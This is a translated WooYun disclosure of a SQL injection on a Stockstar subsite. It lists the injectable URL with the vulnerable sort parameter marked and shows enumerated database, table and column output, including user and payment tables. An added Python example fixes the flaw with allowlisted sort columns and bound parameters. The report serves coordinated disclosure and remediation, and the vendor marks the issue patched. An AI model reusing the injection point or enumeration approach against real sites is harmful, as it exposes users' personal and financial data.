
Vulnerability summary (followers: 24)

Defect ID: wooyun-2014-081237

Title: High-risk SQL injection on a Stockstar (证券之星) subsite (affects user data)

Vendor: Stockstar (证券之星)

Author: 黑暗游侠

Submitted: 2014-10-29 18:47

Fixed: 2014-12-13 18:48

Published: 2014-12-13 18:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor has confirmed

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2014-10-29: Details sent to the vendor, awaiting vendor response
2014-10-30: Vendor confirmed; details visible to the vendor only
2014-11-09: Details disclosed to core white hats and domain experts
2014-11-19: Details disclosed to regular white hats
2014-11-29: Details disclosed to intern white hats
2014-12-13: Details disclosed to the public

Brief description:

A subsite of a large securities company has a high-risk SQL injection.

Detailed description:

Stockstar (证券之星): Chinaz site ranking 412, weight 7.
One of its subsites has a high-risk SQL injection.
http://top.chinaz.com/site_www.stockstar.com.html

[Screenshot: 1.png]

Proof of vulnerability:

Injection URL:

http://win.stockstar.com/api/match/orders?clazz=1,3&orders=*&pn=1&ps=7&status=1,2&type=2&_=1414557380859


available databases [6]:
[*] information_schema
[*] win
[*] win5final
[*] win_mall
[*] win_mode
[*] win_subscribe
Database: win_subscribe
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| conclude | 3435424 |
| message | 58381 |
| subLog | 415 |
| subInfo | 286 |
| `user` | 34 |
+---------------------------------------+---------+
Database: win_mall
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| order_address | 7136 |
| order_detail | 7136 |
| user_address | 1488 |
| product_rule | 103 |
| product | 90 |
+---------------------------------------+---------+
Database: win5final
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| deal_snapshot | 369925 |
| stock_snapshot | 87804 |
| snapshot_log | 26051 |
| money_snapshot | 24522 |
| deal_timeline | 9284 |
| stat | 356 |
| assets_settings | 26 |
| accounts | 10 |
+---------------------------------------+---------+
Database: win
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| win_joined | 5621615 |
| win_credit_detail_win5 | 2294239 |
| win_promotion_history | 1408123 |
| win_account_property | 1218050 |
| vir_currency | 1148580 |
| win_join | 872547 |
| win_userbind | 660019 |
| win_vstock | 654768 |
| win_apply | 652437 |
| win_user | 571656 |
| win_apply_info | 571655 |
| win_user_spacehost | 571655 |
| winid | 571655 |
| vir_currency_order | 546332 |
| vir_currency_detail | 542995 |
| win_trade_account | 350436 |
| win_trade_upgrade | 289361 |
| win_trade_account_role | 289251 |
| win_promotion | 213626 |
| win_credit | 172989 |
| win_honor | 75006 |
| win_common_member | 64647 |
| win_credit_detail | 52709 |
| win_common_maillist | 42160 |
| win_common_mailqueue | 42160 |
| win_common_member_digest | 39783 |
| win_mode | 37569 |
| win_capital_log | 23164 |
| win_concerned | 18993 |
| tmp_win_promotion | 16760 |
| win_contract | 13607 |
| attend_record | 13120 |
| del_win_joined_20140811 | 12968 |
| payment_order_detail | 8011 |
| attend_basic | 7407 |
| payment_order | 7086 |
| play_rule_detail | 4050 |
| news | 2177 |
| payment_result | 2105 |
| play_award | 1218 |
| attend_prize | 1212 |
| win_subscribe_code | 1184 |
| play_basic | 470 |
| win_trust | 240 |
| win_ad | 154 |
| win_open_auth | 153 |
| win_text_message | 144 |
| win_feedback | 93 |
| win_trust_message | 89 |
| win_team | 28 |
| dict_detail | 20 |
| rule_dict | 18 |
| win_account_type | 9 |
| play_honour | 8 |
| win_subcode_type | 8 |
| win_trade_role | 6 |
| dict_basic | 1 |
| win_open_appinfo | 1 |
+---------------------------------------+---------+
Database: win_mode
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ticket_audit | 676891 |
| mode_info | 37625 |
| ticket_log | 20989 |
| compulsory_reducation_log | 2700 |
| financing_log | 1177 |
| financing_status | 673 |
| financing_rule | 3 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1176 |
| SESSION_VARIABLES | 326 |
| GLOBAL_VARIABLES | 315 |
| GLOBAL_STATUS | 287 |
| SESSION_STATUS | 287 |
| STATISTICS | 229 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| PARTITIONS | 121 |
| TABLES | 121 |
| PROCESSLIST | 120 |
| KEY_COLUMN_USAGE | 106 |
| TABLE_CONSTRAINTS | 96 |
| CHARACTER_SETS | 39 |
| PLUGINS | 20 |
| SCHEMA_PRIVILEGES | 19 |
| ENGINES | 9 |
| SCHEMATA | 6 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: win
Table: win_joined
[12 columns]
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| accountId | int(11) |
| beginTime | datetime |
| ctime | datetime |
| endTime | datetime |
| id | bigint(20) |
| name | varchar(80) |
| playId | int(11) |
| pNum | smallint(4) |
| rank | int(11) |
| rate | decimal(19,3) |
| teamId | int(11) |
| userId | int(11) |
+-----------+---------------+

Remediation:

Filter the input parameters.
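The report only says "filter". The injectable URL carries a sort parameter (orders=*) alongside comma-separated lists (clazz, status) and paging values (pn, ps), which is the combination where plain parameter binding is not enough: a column name in ORDER BY cannot be bound as a placeholder, so it has to come from a fixed allowlist, while every value can and should be bound. The following is an added example of that fix; it is not Stockstar's code, and the table name match_orders, its columns and the allowlists are constructed assumptions chosen only to mirror the parameter names in the reported URL.

```python
import re
import sqlite3

# Constructed allowlists (assumption, not the site's real schema): the only
# identifiers the request may ever place into the SQL text.
ALLOWED_ORDER_COLUMNS = {"id", "ctime", "rate"}
ALLOWED_DIRECTIONS = {"asc", "desc"}
MAX_PAGE_SIZE = 100


class InvalidParameter(ValueError):
    """Raised for any request value that fails the allowlist checks."""


def parse_int_list(raw, name):
    """'1,3' -> [1, 3]; anything that is not a short run of digits is rejected."""
    items = []
    for part in raw.split(","):
        part = part.strip()
        if not re.fullmatch(r"[0-9]{1,9}", part):
            raise InvalidParameter(f"{name}: bad value {part!r}")
        items.append(int(part))
    return items


def parse_orders(raw):
    """'rate desc' -> ('rate', 'desc'); column and direction must be allowlisted."""
    parts = raw.strip().lower().split()
    if len(parts) == 1:
        parts.append("asc")
    if len(parts) != 2:
        raise InvalidParameter("orders: malformed")
    col, direction = parts
    if col not in ALLOWED_ORDER_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise InvalidParameter(f"orders: {raw!r} not permitted")
    return col, direction


def parse_page(raw, name, upper):
    """Positive integer within [1, upper]; used for pn (page) and ps (page size)."""
    if not re.fullmatch(r"[0-9]{1,6}", raw.strip()):
        raise InvalidParameter(f"{name}: bad value {raw!r}")
    value = int(raw)
    if not 1 <= value <= upper:
        raise InvalidParameter(f"{name}: out of range")
    return value


def build_query(params):
    """Return (sql, args). Identifiers come only from the allowlist; every
    user-supplied value is passed as a bound parameter, never concatenated."""
    clazz = parse_int_list(params.get("clazz", ""), "clazz")
    status = parse_int_list(params.get("status", ""), "status")
    col, direction = parse_orders(params.get("orders", "id"))
    pn = parse_page(params.get("pn", "1"), "pn", 10**6)
    ps = parse_page(params.get("ps", "20"), "ps", MAX_PAGE_SIZE)
    sql = (
        "SELECT id, clazz, status, rate FROM match_orders "
        f"WHERE clazz IN ({','.join('?' * len(clazz))}) "
        f"AND status IN ({','.join('?' * len(status))}) "
        f"ORDER BY {col} {direction} LIMIT ? OFFSET ?"
    )
    return sql, clazz + status + [ps, (pn - 1) * ps]


def is_valid_request(params):
    """True if every parameter passes the allowlist checks, False otherwise."""
    try:
        build_query(params)
        return True
    except InvalidParameter:
        return False


def sample_db():
    """In-memory SQLite table with constructed rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE match_orders "
                 "(id INTEGER, clazz INTEGER, status INTEGER, rate REAL, ctime TEXT)")
    conn.executemany("INSERT INTO match_orders VALUES (?,?,?,?,?)", [
        (1, 1, 1, 0.12, "2014-10-01"),
        (2, 3, 2, 0.35, "2014-10-02"),
        (3, 2, 1, 0.50, "2014-10-03"),   # clazz 2: not requested, filtered out
        (4, 1, 3, 0.80, "2014-10-04"),   # status 3: not requested, filtered out
        (5, 3, 1, 0.20, "2014-10-05"),
    ])
    return conn


def fetch_order_ids(conn, params):
    """Run the validated query and return the matching ids in sort order."""
    sql, args = build_query(params)
    return [row[0] for row in conn.execute(sql, args).fetchall()]


if __name__ == "__main__":
    db = sample_db()
    request = {"clazz": "1,3", "orders": "rate desc", "pn": "1", "ps": "7", "status": "1,2"}
    print(fetch_order_ids(db, request))          # [2, 5, 1]
    print(is_valid_request(dict(request, orders="(SELECT 1)")))  # False
```

The design point is the split: values (clazz, status, pn, ps) are bound with placeholders so the database never parses them as SQL, while the one thing that cannot be bound, the ORDER BY column, is replaced by an allowlisted constant rather than filtered by pattern. Rejecting a request before it reaches the database also gives the server a clean place to log the bad parameter for detection.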

Copyright notice: when reposting, credit the source as 黑暗游侠@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-10-30 10:04

Vendor reply:

Thanks to the white hat for the hard work; the vulnerability has been patched.

Latest status:

2014-12-13: Patched